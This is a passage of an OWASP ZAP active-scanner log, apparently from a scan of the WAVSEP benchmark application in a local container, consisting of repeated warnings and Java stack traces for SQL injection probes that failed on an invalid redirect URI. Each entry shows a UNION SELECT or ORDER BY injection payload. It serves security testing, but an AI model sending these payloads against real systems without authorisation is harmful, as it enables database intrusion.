org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680381 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680382 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680383 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 9146-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 9146-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680384 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680386 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680388 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680389 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680391 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680392 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680394 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680396 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680398 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680400 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 